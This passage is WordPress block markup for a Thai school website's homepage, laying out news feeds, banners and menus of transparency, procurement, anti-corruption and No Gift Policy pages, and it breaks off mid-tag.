{\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item 